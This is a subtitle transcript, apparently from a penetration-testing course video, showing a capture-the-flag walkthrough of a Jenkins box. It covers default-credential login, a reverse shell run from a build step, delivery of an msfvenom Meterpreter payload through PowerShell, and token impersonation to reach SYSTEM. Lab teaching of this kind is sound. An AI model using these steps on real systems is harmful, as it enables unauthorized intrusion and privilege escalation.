1
00:00:00,210 --> 00:00:03,460
Here we are with our old friend Jenkins.

2
00:00:03,540 --> 00:00:08,220
If you looked at the logo you kind of understood what you were getting yourself into.

3
00:00:08,220 --> 00:00:14,790
Now this exploit is going to feel a little familiar because of Jenkins but there are paths that we have

4
00:00:14,790 --> 00:00:19,380
not taken in this course and a little bit of modification to how we actually get there.

5
00:00:19,980 --> 00:00:28,470
So I'm curious to see how you performed now this exploit itself does require a little bit of metal supply

6
00:00:28,980 --> 00:00:32,340
and that's OK so we're going to use mostly here.

7
00:00:32,790 --> 00:00:38,340
But what we're gonna do is we're going to get a low level Shell will escalate that shell up and then

8
00:00:38,340 --> 00:00:42,060
we're going to perform our escalation completely.

9
00:00:42,090 --> 00:00:49,460
So let's go ahead and take a look at the scan now the scan has port 80 open 3 3 8 9 and 80 80.

10
00:00:49,530 --> 00:00:59,910
So go ahead and just go to those Web pages so we'll do is we'll go to port 80 and we'll go to port 80

11
00:00:59,910 --> 00:01:09,960
80 and you could see that we have good old Bruce Wayne here and Alfred at Wayne Enterprises dot com.

12
00:01:09,990 --> 00:01:15,030
So we've got perhaps a user name perhaps a couple of user names depending on how Capture the Flag.

13
00:01:15,060 --> 00:01:16,680
This box really is.

14
00:01:16,770 --> 00:01:18,480
And then we've got this admin portal.

15
00:01:18,570 --> 00:01:24,960
So if we can't log in here then what we're gonna need to do is examine this further maybe we'll do some

16
00:01:24,960 --> 00:01:29,080
sort of directory busting or look at the source code see where we need to go.

17
00:01:29,220 --> 00:01:33,480
We can gather information here to perhaps see log in is Alfred.

18
00:01:33,480 --> 00:01:35,790
Perhaps it's Bruce perhaps as this email.

19
00:01:36,180 --> 00:01:40,750
So any sort of brute forcing that we might perform on this page.

20
00:01:40,950 --> 00:01:41,880
It's possible.

21
00:01:41,880 --> 00:01:47,700
However it's always worth just trying an avid and seeing where that gets you in life because you would

22
00:01:47,700 --> 00:01:48,950
be very surprised.

23
00:01:48,960 --> 00:01:55,260
I've seen this on bug bounties before where you just go and you type admin admin on a page and it loads

24
00:01:55,260 --> 00:01:56,170
right up.

25
00:01:56,280 --> 00:01:58,080
So that's easy right.

26
00:01:58,470 --> 00:02:06,860
Now we're in here and we have the opportunity to look around just like we did before so we have this

27
00:02:06,860 --> 00:02:13,250
build history we've got managed Jenkins we could look at different parts of this.

28
00:02:13,250 --> 00:02:19,310
Remember last time we came in here we were able to do the groovy shell with the Jenkins CSI or the script

29
00:02:19,310 --> 00:02:25,250
console and see if we can get a shell now we could try this one if we want but there was a suggested

30
00:02:25,250 --> 00:02:33,080
path otherwise if we come into Alfred and we scroll down a little bit you'll see that there is a suggested

31
00:02:33,080 --> 00:02:38,420
path of using power shell in here maybe its initial access.

32
00:02:38,420 --> 00:02:43,820
It says you should use power shell so it says use power shell to get this.

33
00:02:43,820 --> 00:02:45,510
Now how are we going to do that.

34
00:02:45,560 --> 00:02:56,590
Well if we go into build history and we look at project we could take a look at the job project and

35
00:02:56,590 --> 00:03:06,770
then we could go over to configure so if we scroll through configure take a look at what we can do we

36
00:03:06,770 --> 00:03:11,630
can run a command here look you can see execute windows batch command.

37
00:03:12,500 --> 00:03:15,230
And here we've got who am I.

38
00:03:15,230 --> 00:03:16,460
But why do we have to run.

39
00:03:16,460 --> 00:03:16,960
Who am I.

40
00:03:16,960 --> 00:03:19,700
Why can't we run a reverse shell.

41
00:03:19,700 --> 00:03:20,720
So we'll cheat a little bit.

42
00:03:20,720 --> 00:03:25,200
We'll just copy this and we're going to paces into here.

43
00:03:25,310 --> 00:03:30,870
Now we need to invoke power shell TCB.

44
00:03:30,950 --> 00:03:33,350
P.S. 1 What is this Will we go take a look.

45
00:03:33,350 --> 00:03:39,110
This is Miss Shang if you've never seen this saying this is a very popular reverse shelf to go out to

46
00:03:39,110 --> 00:03:44,580
Google and just put that in here and you'll see the shaking invoked power shell that piece won.

47
00:03:44,690 --> 00:03:51,110
So we'll just go ahead and grab this the raw version copy it and then we'll open a new folder and we'll

48
00:03:51,110 --> 00:03:59,320
just put this in and transfer and we will get it this really quick we'll call it what it is which is

49
00:03:59,320 --> 00:04:09,170
invoke power shell DCP that P.S. One and paste in here and save.

50
00:04:09,320 --> 00:04:10,200
All right.

51
00:04:10,280 --> 00:04:14,450
So now we need to do is we need to say OK.

52
00:04:14,480 --> 00:04:17,210
So we have our IP which I don't actually know my piece.

53
00:04:17,220 --> 00:04:22,620
Let's grab our IP 10 to 11 but forward at 1 14.

54
00:04:22,650 --> 00:04:30,320
So go ahead and do ten eleven dot forward 114 on port 80.

55
00:04:30,480 --> 00:04:37,520
We're grabbing this then we need to do it reverse of our IP address and then the port.

56
00:04:37,520 --> 00:04:42,180
So let's do a reverse of 10 dot 11 enough for it at 1 14.

57
00:04:42,440 --> 00:04:50,120
Our port we could just do something like four four three would be fine and now let's go ahead and run

58
00:04:50,180 --> 00:04:52,180
net cap on this.

59
00:04:52,250 --> 00:05:03,820
So say net cat and the LP on 4 4 3 and we'll go ahead and save this let's make sure that we also have

60
00:05:03,880 --> 00:05:05,740
our Python running.

61
00:05:05,770 --> 00:05:14,950
Let's open up a new tab here and we're just going to say python on that and simple HBP server on Haiti

62
00:05:15,910 --> 00:05:23,210
and then we're gonna go ahead and just say build now and it should go out and grab this from poor 80.

63
00:05:23,210 --> 00:05:25,070
You could see the grab happen.

64
00:05:25,130 --> 00:05:26,270
It should execute.

65
00:05:26,270 --> 00:05:27,650
And here we are.

66
00:05:27,650 --> 00:05:34,760
So now we say who am I and we are Alfred Bruce perfect.

67
00:05:34,990 --> 00:05:41,210
So if we do a little bit of enumeration we can do a system info see where we're at.

68
00:05:41,230 --> 00:05:48,620
2015 looks relatively newer doesn't mean that there's not exploits here available to us but you could

69
00:05:48,620 --> 00:06:00,570
see that we are running on Windows 7 Ultimate Service Pack 1 Build 76 0 1 and we can do some basic commands

70
00:06:00,590 --> 00:06:09,240
so who am I and we can look at the privacy which is important so we look at the privacy.

71
00:06:09,260 --> 00:06:10,720
A lot of them are disabled.

72
00:06:10,730 --> 00:06:19,980
But let's look at what's enabled debug to enable change notify impersonates enabled and create global

73
00:06:19,990 --> 00:06:21,630
privilege.

74
00:06:21,640 --> 00:06:29,170
So what I want to do is I want to look at the impersonate now not saying this is the first path you

75
00:06:29,170 --> 00:06:29,830
should've taken.

76
00:06:29,830 --> 00:06:33,180
This is the path that we're taking forward the video itself.

77
00:06:33,430 --> 00:06:36,820
You should have ran all of your checks.

78
00:06:36,940 --> 00:06:43,420
You should have run if you're power up or you're Sherlock or Windows XP suggests or when PS however

79
00:06:43,420 --> 00:06:46,690
you wanted to approach this was absolutely the correct way.

80
00:06:46,690 --> 00:06:49,300
I'm just moving forward just to save time.

81
00:06:49,510 --> 00:06:56,710
Now eventually what it boils down to is this impersonate token and what we're gonna do is we're gonna

82
00:06:56,770 --> 00:07:03,940
elevate to a mature critter shell and with that return British Shell we're gonna go ahead and pull up

83
00:07:04,990 --> 00:07:12,280
a incognito and see where we can get with that so let's go ahead and go to a motel operator shell so

84
00:07:12,280 --> 00:07:18,490
quickly what we're gonna do is we're gonna close out of here and we're just gonna say MSF venom we'll

85
00:07:18,490 --> 00:07:20,920
do a payload of windows and interpreter

86
00:07:23,290 --> 00:07:29,510
and we find the architecture on the system X 64 based.

87
00:07:29,510 --> 00:07:42,840
So we're gonna need 64 bit architecture we'll do reverse TCB and we'll add in the 64 bit.

88
00:07:42,920 --> 00:07:43,390
All right.

89
00:07:43,400 --> 00:07:57,140
And then we'll say l host equals ten eleven forward 114 L four equals and we'll say seven seven seven

90
00:07:57,140 --> 00:08:07,990
seven file type is executable and then we'll just put this into a shell we'll call Shell X that you

91
00:08:08,060 --> 00:08:12,200
see just because I don't know if I have a shell in here I guess it really doesn't matter but I'll write

92
00:08:12,200 --> 00:08:20,840
this out and then we're gonna go ahead and search you till this on over if we can or we can do a power

93
00:08:20,840 --> 00:08:25,550
shell to grab so we'll can try a different technique if you want to grab with power shell.

94
00:08:25,910 --> 00:08:29,150
So we'll do here is first let's go ahead and

95
00:08:33,150 --> 00:08:36,110
start up MSF venom or MSF console.

96
00:08:36,160 --> 00:08:38,940
We're gonna need to catch the shell with our multi handler

97
00:08:42,720 --> 00:08:45,150
so we can say use multi handler

98
00:08:47,840 --> 00:08:52,870
and then we're just gonna say set payload windows X 64.

99
00:08:52,910 --> 00:08:59,410
INTERPRETER reverse DCP set.

100
00:08:59,510 --> 00:09:03,320
Host to tend eleven up forward at 114.

101
00:09:03,470 --> 00:09:08,440
Set our airport to all sevens and that should be good to run.

102
00:09:08,450 --> 00:09:10,690
Let's check the options.

103
00:09:10,730 --> 00:09:12,200
Looks good to me.

104
00:09:12,250 --> 00:09:16,850
I'm going to run that now with our shell here.

105
00:09:16,850 --> 00:09:23,780
We're in a power Shell Shell so we can quickly run some sort of power shell and I'm going to show you

106
00:09:23,780 --> 00:09:26,040
an example really quick.

107
00:09:26,090 --> 00:09:32,930
OK so we're gonna do is we're gonna go ahead and try to paste this in and it's just a basic power shell

108
00:09:32,980 --> 00:09:38,430
man that says hey I want you to download this file off of this server and then I want you to save it

109
00:09:38,460 --> 00:09:40,090
as Shell that XY.

110
00:09:40,140 --> 00:09:42,690
Now what I'm gonna do is make sure that we are hosting this.

111
00:09:42,750 --> 00:09:49,440
So let's go back and host this file and I'm going to run this command here.

112
00:09:49,510 --> 00:09:54,570
Now you can find this command just by downloading or just by searching a basic download command.

113
00:09:55,180 --> 00:10:00,820
And then once we download it all we have to do is do a start process to say start process and then we'll

114
00:10:00,860 --> 00:10:06,350
say Shell X Di XY or shell that you see at this point sorry.

115
00:10:06,990 --> 00:10:07,990
We'll see if you pop a shell

116
00:10:13,550 --> 00:10:15,700
get you Aidid or Alpha Bruce.

117
00:10:15,710 --> 00:10:19,180
So we have successfully brought the shell over.

118
00:10:19,250 --> 00:10:24,380
So if this doesn't work for you for some reason you can also use web delivery and generate a power shell

119
00:10:24,410 --> 00:10:26,660
exploit which may even be easier.

120
00:10:26,750 --> 00:10:27,840
But here we are.

121
00:10:27,860 --> 00:10:28,940
We're good.

122
00:10:28,940 --> 00:10:33,860
Now let's go ahead and load up incognito and we could do to get prints here as well.

123
00:10:33,860 --> 00:10:39,610
Don't forget about get Cribbs and you can see that we do have the impersonate available to us.

124
00:10:40,210 --> 00:10:47,390
So with Incognito let's go ahead and list the tokens and you could see that we have a few different

125
00:10:47,390 --> 00:10:49,650
tokens available to us.

126
00:10:49,670 --> 00:10:52,040
One is the authority system.

127
00:10:52,400 --> 00:10:59,400
So all I'm going to do is just copy the authority system and try to elevate into that so let's copy

128
00:10:59,400 --> 00:11:07,730
that unless let's just say impersonate token and we'll paste this and see if it works OK.

129
00:11:07,740 --> 00:11:12,120
And now we'll say get you I.D. and now authority system.

130
00:11:12,220 --> 00:11:17,370
If we drop into a shall see if it works case we have an issue creating a shell here.

131
00:11:18,300 --> 00:11:21,590
So let's do a quick P.S. And look at what's going on.

132
00:11:21,660 --> 00:11:25,550
It could be that our shell that we're on is not not working for us.

133
00:11:26,370 --> 00:11:30,300
So let's try to migrate off of what we're on right now into a different service.

134
00:11:30,300 --> 00:11:35,710
So let's go ahead and just say migrate 30 32 and see if that works for us.

135
00:11:35,730 --> 00:11:39,160
Unfortunately that failed and that does happen sometimes.

136
00:11:39,180 --> 00:11:44,990
So let's go ahead and rerun this and it should be straightforward and we'll just have to find another

137
00:11:44,990 --> 00:11:46,390
process to run into

138
00:11:52,140 --> 00:11:55,100
and I'm I'm going to hunt down the SBC hosts.

139
00:11:55,110 --> 00:12:01,590
So we're going to try to go into anything that's running as authorities system the next one that I see

140
00:12:01,590 --> 00:12:04,110
as SBC host is thirty six.

141
00:12:04,110 --> 00:12:07,340
So we can try to migrate into that.

142
00:12:07,930 --> 00:12:08,880
See if that works

143
00:12:13,430 --> 00:12:19,100
and now it completed successfully get you I.D. let's see if we are tried typing shell and now we have

144
00:12:19,100 --> 00:12:19,910
a shell.

145
00:12:20,090 --> 00:12:21,200
Who am I.

146
00:12:21,200 --> 00:12:22,380
Authority system.

147
00:12:22,550 --> 00:12:27,790
So let's retrace that really quick just to make sure we're on the same page.

148
00:12:27,980 --> 00:12:35,210
Sometimes when we have a shell even though we are showing as authority system we're not fully on the

149
00:12:35,210 --> 00:12:36,380
authority system.

150
00:12:36,380 --> 00:12:40,580
If we type in Shell and we can't drop into the channel we're having some issues.

151
00:12:40,580 --> 00:12:46,530
So we have limited commands because of that we need to migrate off of what we're at.

152
00:12:47,430 --> 00:12:48,180
So we're on.

153
00:12:48,180 --> 00:12:56,490
Originally this 28 16 this shell and we're on the shell even though we elevated as as Bruce so we elevated

154
00:12:56,490 --> 00:12:58,440
from Bruce to authority system.

155
00:12:58,590 --> 00:13:00,840
We're still stuck here on this shell.

156
00:13:01,170 --> 00:13:03,420
So we're still kind of in this weird place.

157
00:13:03,420 --> 00:13:05,430
We need to move off of this.

158
00:13:05,430 --> 00:13:10,530
So I was looking for different SBC hosts because they're pretty reliable that are running as authorities

159
00:13:10,530 --> 00:13:13,770
system because that's who we are who we want to be.

160
00:13:14,010 --> 00:13:20,580
And we were able to migrate into 17 36 so it's patients with migration sometimes it works sometimes

161
00:13:20,580 --> 00:13:21,420
it doesn't.

162
00:13:21,420 --> 00:13:24,060
Here we are we got it to work and we elevated.

163
00:13:24,060 --> 00:13:27,600
So let's take this and think about it really quick.

164
00:13:27,600 --> 00:13:34,790
We have gone through yet another type of Jeeves exploit their Jenkins exploit.

165
00:13:34,800 --> 00:13:35,100
Right.

166
00:13:35,100 --> 00:13:41,360
We did Jeeves and now we've done this Jenkins slash Alfred box and it was a different path.

167
00:13:41,370 --> 00:13:45,930
Just a little bit different path but something that you should have gotten something that you've seen

168
00:13:45,930 --> 00:13:46,470
before.

169
00:13:46,470 --> 00:13:51,330
And then when we got to this potato or net potato when we got to this impersonation exploit.

170
00:13:51,330 --> 00:13:58,410
Not all potatoes when we got to this Incognito exploit which is again very very possible from a real

171
00:13:58,410 --> 00:13:59,250
world perspective.

172
00:13:59,250 --> 00:14:00,330
I love incognito.

173
00:14:00,330 --> 00:14:07,290
It's a great tool it's comes up on interviews so it's definitely important to know we came across sex

174
00:14:07,290 --> 00:14:12,870
boy and we were able to utilize it to move into another user so that delegate token was available to

175
00:14:12,870 --> 00:14:18,480
us we migrated into that delegate token and or you personally that delegate token and then we were able

176
00:14:18,480 --> 00:14:26,220
to migrate into a different PPD and successfully captured authority system.

177
00:14:26,220 --> 00:14:33,520
So we are done with three boxes now we've got two left to go so from here we're gonna go ahead and take

178
00:14:33,520 --> 00:14:35,890
on Bastion from hack the box.

179
00:14:35,890 --> 00:14:41,050
So it's getting a little bit harder but we're almost through this capstone so I'll catch you over as

180
00:14:41,050 --> 00:14:43,090
we walk through bastion in the next video.